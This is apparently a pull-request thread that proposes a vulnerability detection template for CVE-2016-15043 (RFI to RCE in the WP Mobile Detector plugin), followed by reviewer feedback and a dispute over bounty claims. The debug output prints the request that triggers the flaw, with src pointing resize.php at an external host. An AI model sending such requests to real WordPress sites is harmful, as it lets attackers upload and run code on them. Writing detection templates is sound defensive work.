Add CVE-2016-15043 detection template

[KrE80r]

/claim #14673

Summary

• Add detection template for CVE-2016-15043 (WP Mobile Detector <= 3.5 RFI to RCE)

Template Validation

• Validated with vulnerable host (WP Mobile Detector 3.5)
• Validated with clean WordPress (no false positives)

Debug Output

[CVE-2016-15043:word-1] [http] [critical] http://localhost:8888/wp-content/plugins/wp-mobile-detector/resize.php?src=http://xxx.oast.pro/test.php

OOB callback confirmed - server fetched external URL and cached to /wp-content/plugins/wp-mobile-detector/cache/.

Test Environment

Vulnerable environment shared privately

References

• https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
• https://wpscan.com/vulnerability/e4739674-eed4-417e-8c4d-2f5351b057cf
• https://www.exploit-db.com/exploits/39891

[Akokonunes]

Hi @KrE80r

Thanks for the submission ! However, there's a template logic issue - the second request's matcher checking interactsh_protocol: http doesn't make sense since it's fetching from the local cache directory, not triggering a new callback. Only the first request should check interactsh_protocol. More importantly, you mentioned a Docker environment is "available privately upon request" but haven't actually sent the vulnerable target details or setup instructions to templates@projectdiscovery.io as required by the bounty program.

Please send the vulnerable environment for validation and fix the matcher logic.

[KrE80r]

Hi @KrE80r

Thanks for the submission ! However, there's a template logic issue - the second request's matcher checking interactsh_protocol: http doesn't make sense since it's fetching from the local cache directory, not triggering a new callback. Only the first request should check interactsh_protocol. More importantly, you mentioned a Docker environment is "available privately upon request" but haven't actually sent the vulnerable target details or setup instructions to templates@projectdiscovery.io as required by the bounty program.

Please send the vulnerable environment for validation and fix the matcher logic.

Thanks @Akokonunes for the comment, I made the change and shared the env privately.

[D3nverNg]

Hi @Akokonunes, I previously opened PR #14674 before this one, but it hasn’t been reviewed yet. Could you please let me know how the team’s PR review process works, and why this PR was reviewed earlier than mine?

[KrE80r]

Just will put the timeline of commits on both PRs here for @Akokonunes and the team to review

2026-01-02T02:04:14Z | PR 14674 | commit f607906 |initial commit, please verify template details and relevance to the exploit

2026-01-02T02:31:45Z | PR 14675 | commit 0f9d9c4 | This PR was created

2026-01-02T03:21:25Z | PR 14674 | b050ed6 | PR 14674 template completely modified

[Akokonunes]

Hi @KrE80r

Thank you for participating in the Bounty Claim Program. The template in PR #14674 meets all the requirements, including providing a testable lab/instance to verify the template over email. As a result, we’ve decided to accept that submission and will be closing this one out